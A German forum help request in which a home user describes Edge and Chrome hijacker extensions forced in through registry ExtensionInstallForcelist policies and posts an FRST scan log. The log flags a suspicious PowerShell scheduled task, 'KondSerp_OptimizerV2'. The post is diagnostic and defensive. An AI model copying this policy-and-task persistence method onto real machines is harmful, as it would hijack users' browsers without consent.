| |
| |||||||
Log-Analyse und Auswertung: Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker ErweiterungWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
23.07.2024, 13:38
| #1 |
| |  Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Hallo zusammen, auf unserem Familien Compter, haben wir uns scheinbar zwei Browser Hijacker, eingefangen: Symptome: Edge: 1. Edge Browser Richtlinie (edge://policy) ExtensionInstallForceList aktiviert sich immer wieder 2. Edge Erweiterung "Beautiful New Tab" installiert sich selbständig und ist nicht deaktivier- oder löschbar Chrome: 1. Chrome Browser Richtlinie (Chrome://policy) ExtensionInstallForceList aktiviert sich immer wieder 2. Chrome Erweiterung "Qtr Search" installiert sich selbständig und ist nicht deaktivier- oder löschbar Bisherige ergebnislose Lösungsversuche: 1. Scans mit Windows Defender 2. Scans mit Malwarebytes Anti-Malware & adwcleaner Beobachtungen: 1. "Beautiful New Tab" Erweiterung schreibt sich in der Registry in: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist 2. "Qtr Search" Erweiterung schreibt sich in der Registry in: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist 3. Löschung des gesamten Keys inkl. "ExtensionInstallforceList" wirkt zumindest soweit, dass die Meldung im Edge Browser "Von Ihrer Organisation verwaltet" für einige Zeit (Zeitraum nicht gemessen, ggf. ca 1h oder wenig) verschwindet. Danach taucht wieder "Von Ihrer Organisation verwaltet" auf Die "ApplicationInstallForceList" Policy aktiviert sich weiterhin immer wieder... Rahmenbedingungen: - Windows 11 Home - Aktuelles Patchlevel - Windows Defender aktiv, aktuell und nach Beschreibung im Trojaner-Board, eingestellt - Kein Defender Application Guard (Service nicht installiert) FRST Log: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 21.07.2024
durchgeführt von skysc (Administrator) auf SKYSGAMINGPC-CA (Micro-Star International Co., Ltd. MS-7C56) (22-07-2024 21:17:59)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe
Geladene Profile: skysc
Plattform: Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Edge
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> Micro-Star INT'L CO., LTD.) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p\DCv2\DCv2.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe
(C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Engine\CC_Engine_x64.exe
(C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.254.0.13\OverwolfHelper.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.254.0.13\OverwolfHelper64.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe <4>
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Users\skysc\AppData\Local\Overwolf\ProcessCache\0.254.0.13\cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj\curseforge.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.AlwaysOnTop.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.Awake.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.ColorPickerUI.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.CropAndLock.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\WinUI3Apps\PowerToys.Peek.UI.exe
(C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe <6>
(C:\Users\skysc\AppData\Local\Programs\Opera GX\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\109.0.5097.142\opera_crashreporter.exe
(Discord Inc. -> Discord Inc.) C:\ProgramData\skysc\Discord\app-1.0.9154\Discord.exe <6>
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <7>
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\regedit.exe
(explorer.exe ->) (Moonsworth, LLC -> Moonsworth LLC) C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe <4>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(explorer.exe ->) (VideoLAN -> VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <10>
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\opera.exe <41>
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(services.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe
(services.exe ->) (NortonLifeLock Inc. -> NortonLifelock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe <2>
(services.exe ->) (NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (RealDefense, LLC -> SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe
(services.exe ->) (Samsung Electronics CO., LTD. -> ) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(sihost.exe ->) (6099D0EF-9374-47ED-BDFE-A82136831235 -> File-New-Project) C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne\EarTrumpet\EarTrumpet.exe
(svchost.exe ->) (A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> ) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p\Gamebar_Widget.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileCoAuth.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\WidgetService.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <10>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\LocationNotificationWindows.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\Packages\Preview\amd64\MoUsoCoreWorker.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.TerminalServer.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Speed Up\StorageMonitor.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\True Color\New\MSI.True Color.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Engine.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe [1945544 2024-02-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [MSIRegister] => C:\Program Files (x86)\MSI\MSIRegister\MSIRegister.exe [1266864 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4407656 2024-07-17] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Stable] => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1832968 2024-07-08] (Overwolf Ltd -> Overwolf Ltd.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37550568 2024-06-21] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Discord] => C:\ProgramData\skysc\Discord\Update.exe [1525024 2023-11-06] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [] => [X]
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [11248160 2024-04-29] (RealDefense LLC -> SUPERAntiSpyware)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Lunar Client] => C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe [176849464 2024-07-22] (Moonsworth, LLC -> Moonsworth LLC)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [MicrosoftEdgeAutoLaunch_B751ED54CA5804D0129CEDA4AA0FE63C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (Keine Datei)
HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_23_5] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.23.5" (Keine Datei)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\126.0.6478.182\Installer\chrmstp.exe [2024-07-17] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\Installer\chrmstp.exe [2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)
HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {31A29B33-2F9D-4E5A-B113-C2F9AE0A2F8D} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {FFF40F90-C4A9-480F-AF6F-95D6FE70C03E} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {8FE0E829-5739-4830-B8A4-8EADE5477709} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem128.0.6597.0{08699C9D-C6E5-410E-854E-9120298296B0} => C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe [4889704 2024-07-15] (Google LLC -> Google LLC)
Task: {7FE0D883-DA2A-4259-AA1B-F2D690708800} - System32\Tasks\KondSerp_OptimizerV2 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [450560 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -File C:/Windows/System32/KondSerp_Optimizer.ps1 <==== ACHTUNG
Task: {C4F8F6AF-D8BB-46EB-BA88-43F5FDF7B4B3} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {506BA0A8-DADC-4595-B0DA-A7691B71C178} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {4EE6DC46-FA2C-42D4-A227-D1C2A6DDD040} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {56EC0CC9-972B-4DAD-9FA5-3B9402190B3A} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {880B02F1-E7D2-498A-9A96-8D3CAE66DE9D} - System32\Tasks\Microsoft\Windows\Application Experience\PcaWallpaperAppDetect => C:\Windows\system32\rundll32.exe [90112 2024-07-09] (Microsoft Windows -> Microsoft Corporation) -> %windir%\system32\PcaSvc.dll,PcaWallpaperAppDetect
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
Task: {28ABD9F2-6737-46AD-8E0C-DDC433A2E213} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EF0A3A8E-574C-4DCB-BFF6-6812FDD96FDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BF3E2465-DBAF-44DE-9296-EBE42160D27D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EEBEA335-5213-497F-BC43-9876DE8688BC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B0F24A60-5E79-4210-B730-A2F79708048A} - System32\Tasks\MSI Task Host - LEDKeeper2_Host => C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe [2676840 2023-12-14] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {357123E4-3248-405C-B227-A69F3326D479} - System32\Tasks\MSI Task Host - MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe [81208 2021-09-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {AC26D83B-FCAF-453F-95DE-FE3F8465C2AA} - System32\Tasks\MSI Task Host - TraceFPS => C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe [2780144 2021-01-25] (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.)
Task: {4BD989F5-A0B9-437E-81EE-C28C6C688B44} - System32\Tasks\MSI_GamebarConnect => "C:\Program Files (x86)\MSI\MSI Companion\Gamebar_Connect.exe" -run (Keine Datei)
Task: {BE288D1C-D22E-4A65-B6A3-CE0B3052224E} - System32\Tasks\MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe [119392 2023-08-07] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {1C40815B-A056-4AC2-A931-091E03CB0218} - System32\Tasks\MSI_Toast_Server => C:\Program Files (x86)\MSI\MSI Toast Server\MSIToastServer.exe [31904 2019-03-05] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
Task: {70F898CB-5077-4047-A303-A8EBC1F66A90} - System32\Tasks\MSI_TraceFPS => "C:\Program Files (x86)\MSI\MSI Companion\MSI_TraceFPS.exe" (Keine Datei)
Task: {3F3A6A2A-6264-4493-A43D-B8A22A01190E} - System32\Tasks\Norton 360\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {CA54FDB8-6128-47BD-A0ED-C9D0BBDC5708} - System32\Tasks\Norton 360\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {85460D07-DD81-48AC-9DB8-FAEDDD9E4A9C} - System32\Tasks\Norton 360\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {0700D5B1-102A-4893-9ADA-7185056261A3} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.24.2.6\WSCStub.exe [646520 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {215D98A3-22CF-401A-B072-0FE3E4252469} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1005096 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files\NVIDIA Corporation\NvContainer\-d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {CB09D936-04C5-49C6-91A5-CD343A8088D7} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3345448 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6046E66B-556D-4BB5-96D7-FDFB29791D41} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files (x86)\NVIDIA Corporation\NvNode\--launcher=TaskScheduler
Task: {95330FA2-42F5-4B9D-BCDD-CC2BC8E9858B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFCC5B6E-BB1B-4CFD-B824-89EA3F22A919} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFDA8A96-B078-491E-9E03-8E76DE56ABD2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B0B1CF3B-E160-45F4-8767-2446FF93B44B} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
